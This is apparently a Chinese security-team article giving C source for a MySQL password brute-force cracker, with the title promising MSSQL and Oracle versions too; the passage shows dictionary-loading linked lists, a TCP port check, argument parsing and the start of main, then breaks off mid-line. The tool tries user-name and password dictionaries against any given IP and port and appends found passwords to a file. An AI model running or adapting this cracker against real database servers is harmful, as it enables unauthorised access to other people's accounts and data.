
用链表实现的MYSQL、MSSQL和oracle密码暴破C程序

议题作者:pt007[at]vip.sina.com版权所有,转载请注明版权
信息来源:易做图八进制信息安全团队
/*程序一:用链表实现的MYSQL密码暴破程序,参考了zhouzhen@gmail.com的程序,进行了一些修改*/
#define WIN32_LEAN_AND_MEAN
#if defined(_WIN32) || defined(_WIN64)
#include <windows.h>
#include <Tchar.h>
#endif
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include "F:pt007fdatabasemysqlmysql_pwd_crackincludemysql.h"
#include <stdlib.h>
//链接到WS2_32.LIB库:
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "libmySQL.lib")
/*
 * Linked-list node types used to hold the two dictionaries in memory.
 * Each node stores one fixed-size entry (100 TCHARs) and a pointer to the
 * next node; the list ends where Next is NULL.
 *
 * NOTE(review): the loaders in this file fill these arrays with fgets() and
 * strncpy(), which operate on char. That only type-checks when TCHAR is
 * char (a non-UNICODE build) - confirm the build settings.
 */
/* One password candidate read from the password dictionary. */
typedef struct PassNode{
TCHAR password[100];
struct PassNode * Next;
} PassInfo;
/* One user name read from the user-name dictionary. */
typedef struct NameNode{
TCHAR Name[100];
struct NameNode * Next;
}NameInfo;
/*
 * Print the banner, the option summary and three example command lines to
 * stdout, then terminate the process with exit status 1.
 *
 * The string literals below contain no newline characters, so the whole
 * help text is emitted as one run of text. (The line breaks were presumably
 * lost when the listing was published; they are reproduced here as found.)
 */
void usage(){
    static const char *const help_text[] = {
        "mysql password crack v 1.0 ",
        " author:zhouzhen@gmail.com and pt007@vip.sina.com ",
        "usage : mysql_pwd_crack [ip] [options] ",
        "options: "
        " -u username specify the username of mysql "
        " -x port specify the port of mysql "
        " -p password specify the password of mysql "
        " -d dict specify the dictionary "
        " -a automode automatic crack the mysql password "
        " Note: when u use the -a option, named the username dict user.dic "
        " password dict pass.dic ",
        " example: mysql_pwd_crack 127.0.0.1 -x 3306 -u sql_user.dic -d pass.dic ",
        " mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.dic ",
        " mysql_pwd_crack 127.0.0.1 -x 3306 -a "
    };
    size_t idx;

    /* None of the strings contains a conversion specifier, so fputs()
       writes exactly what printf() would have written. */
    for (idx = 0; idx < sizeof help_text / sizeof help_text[0]; idx++) {
        fputs(help_text[idx], stdout);
    }
    exit(1);
}
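/*
 * Build a singly linked list of password entries from an open dictionary file.
 *
 * NodeNum  - maximum number of entries to read (the caller passes the value
 *            returned by LineCount()).
 * DictFile - dictionary opened for reading, positioned at its start.
 *
 * Returns a dummy head node; the first real entry is head->Next and the list
 * ends where Next is NULL. The caller owns every node. On allocation failure
 * the function prints a message and calls exit(0), as the original did.
 *
 * Fixes relative to the published listing:
 *  - the memset() call had lost its fill argument and did not compile;
 *  - fgets() was unchecked, so at end of file the copy length
 *    strlen("") - 1 wrapped to SIZE_MAX and strncpy() wrote far past the
 *    100-element buffer;
 *  - the last character of a final line without a trailing newline was
 *    dropped, because the code always removed one character;
 *  - the per-line heap buffer (unchecked calloc) is replaced by a local array.
 */
PassInfo * Create_Pass_link(int NodeNum, FILE * DictFile){
    TCHAR line[100];        /* fgets() below needs TCHAR to be char (non-UNICODE build) */
    PassInfo *h, *p, *s;    /* h: dummy head, p: previous node, s: node being added */
    size_t len;
    int i;

    if ( (h = malloc(sizeof *h)) == NULL )
    {
        fprintf(stderr, "malloc failed %d", GetLastError());
        exit(0);
    }
    memset(h->password, 0, sizeof h->password);
    h->Next = NULL;
    p = h;

    for ( i = 0; i < NodeNum; i++ )
    {
        /* Stop early if the file holds fewer entries than the caller expected. */
        if ( fgets(line, (int)(sizeof line / sizeof line[0]), DictFile) == NULL )
            break;

        /* Remove the trailing newline only when one is actually present. */
        len = strlen(line);
        if ( len > 0 && line[len - 1] == '\n' )
            line[len - 1] = '\0';

        if ( (s = malloc(sizeof *s)) == NULL )
        {
            fprintf(stderr, "malloc failed %d", GetLastError());
            exit(0);
        }
        /* Zero-fill first: strncpy() copies at most 99 characters, so the
           last element always stays a terminator. */
        memset(s->password, 0, sizeof s->password);
        strncpy(s->password, line, sizeof s->password / sizeof s->password[0] - 1);
        s->Next = NULL;
        p->Next = s;
        p = s;
    }
    return h;
}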
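/*
 * Build a singly linked list of user-name entries from an open dictionary file.
 *
 * NodeNum  - maximum number of entries to read (the caller passes the value
 *            returned by LineCount()).
 * DictFile - dictionary opened for reading, positioned at its start.
 *
 * Returns a dummy head node; the first real entry is head->Next and the list
 * ends where Next is NULL. The caller owns every node. On allocation failure
 * the function prints a message and calls exit(0), as the original did.
 *
 * Fixes relative to the published listing:
 *  - the memset() call had lost its fill argument and did not compile;
 *  - fgets() was unchecked, so at end of file the copy length
 *    strlen("") - 1 wrapped to SIZE_MAX and strncpy() wrote far past the
 *    100-element buffer;
 *  - the last character of a final line without a trailing newline was
 *    dropped, because the code always removed one character;
 *  - the per-line heap buffer (unchecked calloc) is replaced by a local array.
 */
NameInfo * Create_Name_link(int NodeNum, FILE * DictFile){
    TCHAR line[100];        /* fgets() below needs TCHAR to be char (non-UNICODE build) */
    NameInfo *h, *p, *s;    /* h: dummy head, p: previous node, s: node being added */
    size_t len;
    int i;

    if ( (h = malloc(sizeof *h)) == NULL )
    {
        fprintf(stderr, "malloc failed %d", GetLastError());
        exit(0);
    }
    memset(h->Name, 0, sizeof h->Name);
    h->Next = NULL;
    p = h;

    for ( i = 0; i < NodeNum; i++ )
    {
        /* Stop early if the file holds fewer entries than the caller expected. */
        if ( fgets(line, (int)(sizeof line / sizeof line[0]), DictFile) == NULL )
            break;

        /* Remove the trailing newline only when one is actually present. */
        len = strlen(line);
        if ( len > 0 && line[len - 1] == '\n' )
            line[len - 1] = '\0';

        if ( (s = malloc(sizeof *s)) == NULL )
        {
            fprintf(stderr, "malloc failed %d", GetLastError());
            exit(0);
        }
        /* Zero-fill first: strncpy() copies at most 99 characters, so the
           last element always stays a terminator. */
        memset(s->Name, 0, sizeof s->Name);
        strncpy(s->Name, line, sizeof s->Name / sizeof s->Name[0] - 1);
        s->Next = NULL;
        p->Next = s;
        p = s;
    }
    return h;
}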
/*
 * Count the entries in an open dictionary file.
 *
 * Counts how many times fgets() succeeds with a 100-byte buffer, so a line
 * longer than 99 characters is counted once per 99-character chunk. The
 * stream is rewound to its start before returning.
 */
int LineCount(FILE * fd)
{
    char chunk[100] = {0};
    int total;

    for (total = 0; fgets(chunk, 100, fd) != NULL; total++) {
        /* nothing to do: only the number of successful reads matters */
    }
    rewind(fd); /* leave the stream positioned at the beginning for the next reader */
    return total;
}
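/*
 * Report whether a TCP connection to address:port completes within 5 seconds.
 *
 * address - host name or dotted IPv4 address, resolved with gethostbyname().
 * port    - TCP port number; truncated to unsigned short before use.
 *
 * Returns TRUE when select() reports the non-blocking socket as writable
 * before the timeout, FALSE on any error or timeout.
 *
 * Fixes relative to the published listing:
 *  - the socket() and gethostbyname() failure paths returned without calling
 *    WSACleanup(), and the latter also without closesocket(), leaking the
 *    socket and the Winsock reference; every path after a successful
 *    WSAStartup() now goes through the cleanup labels;
 *  - a WSAStartup() failure is reported with its own return value, which is
 *    where that function delivers its error code;
 *  - the FD_ISSET() test made directly after FD_SET() was always true and has
 *    been dropped;
 *  - the local variable no longer shadows the Winsock function recv().
 */
BOOL IsPortOpen(char * address, int port)
{
    int rc;
    WSADATA wsadata;
    int fd;
    struct sockaddr_in clientaddress;
    struct hostent * host1;
    BOOL Result = FALSE;
    struct timeval timer4;
    fd_set writefd;     /* set of sockets tested for writability */
    ULONG value = 1;

    /* Initialise Winsock, requesting version 1.1. */
    rc = WSAStartup(MAKEWORD(1,1), &wsadata);
    if (rc != 0)
    {
        printf("init failed %d. ", rc);
        return(0);
    }
    if ( LOBYTE( wsadata.wVersion ) != 1 ||
         HIBYTE( wsadata.wVersion ) != 1 ) {
        /* No usable winsock.dll was found. */
        goto out_cleanup;
    }

    /* Create the TCP socket. */
    fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    if (fd < 0)
    {
        printf("[-] Create socket error %d. ",WSAGetLastError());
        goto out_cleanup;
    }

    /* Switch the socket to non-blocking mode so connect() returns at once. */
    ioctlsocket(fd,FIONBIO,&value);

    if (!(host1 = gethostbyname(address))) {
        printf("[-] Gethostbyname(%s) error %d. ",address,WSAGetLastError());
        goto out_close;
    }

    memset(&clientaddress, 0, sizeof clientaddress);
    clientaddress.sin_family = AF_INET;                     /* IPv4 */
    clientaddress.sin_port = htons((unsigned short)port);
    clientaddress.sin_addr = *((struct in_addr *)host1->h_addr);

    timer4.tv_sec = 5;      /* wait at most five seconds */
    timer4.tv_usec = 0;
    FD_ZERO(&writefd);
    FD_SET(fd,&writefd);

    /* The socket is non-blocking, so the outcome is taken from select()
       below and the immediate return value is not used (as in the original). */
    (void)connect(fd, (struct sockaddr *)&clientaddress, sizeof clientaddress);

    /* The socket becoming writable within the timeout means the connect completed. */
    rc = select(fd+1, NULL, &writefd, NULL, &timer4);
    if (rc > 0)
        Result = TRUE;

out_close:
    closesocket(fd);
out_cleanup:
    WSACleanup();
    return Result;
}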
int main(int argc, char **argv)
{
MYSQL *sock,mysql;//定义MYSQL结构
PassInfo * head, * curr = NULL;
NameInfo * headnode, * currnode = NULL;
int namecount = 0, passcount = 0;
/////////////////////////////////////////////////////////////////////////////////////////////
// deal with the command line
//
/////////////////////////////////////////////////////////////////////////////////////////////
if( argc != 5) //参数不为5或8个的时候打印帮助
if(argc != 8)
usage();
if (argc == 8)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-u") )
if ( strcmpi(argv[4], "-p") )
usage();
if ( !strcmpi(argv[4], "-u") )
if ( strcmpi(argv[6], "-d") )
usage();
if ( !strcmpi(argv[4], "-p") )
if ( strcmpi(argv[6], "-d") )
usage();
}
if (argc == 5)
{
if ( strcmpi(argv[2], "-x") )
usage();
if ( strcmpi(argv[4], "-a") )
usage();
}
/* determinate whether the mysql port is open */
if( !IsPortOpen(argv[1], atoi(argv[3]) ) )
{
printf("error:Cant connect to %s:%d ", argv[1], atoi(argv[3]));
exit(0);
}
////////////////////////////////////////////////////////////////////////////////////////////
// specifiy the username
//////////////////////////////////////////////////////////////////////////////////////////////
mysql_init(&mysql); /* init the mysql */
if ( !strcmpi(argv[4], "-u"))
{
/* open the password dictionary */
FILE * passdic = NULL;
if ( (passdic = fopen(argv[7], "r")) ==NULL){
fprintf(stdout, "Cant open the password dictionary ");
exit(0);
}
/* count line of name dictionary */
passcount = LineCount(passdic); //计算密码的数量
head = Create_Pass_link(passcount, passdic); /* create the password link */
curr = head ->Next;
/* open the password dictionary */
FILE * Namedict = NULL;
if ( (Namedict = fopen(argv[5], "r")) ==NULL){
fprintf(stderr, "Cant open the name dictionary ");
exit(0);
}
/*密码最终保存文件*/
FILE *passtxt=NULL;
if ( (passtxt = fopen("pass.txt", "at+")) ==NULL){
fprintf(stdout, "Cant write pass.txt file! ");
exit(0);
}
/* count line of name dictionary */
namecount = LineCount(Namedict);//计算用户名数量
headnode = Crea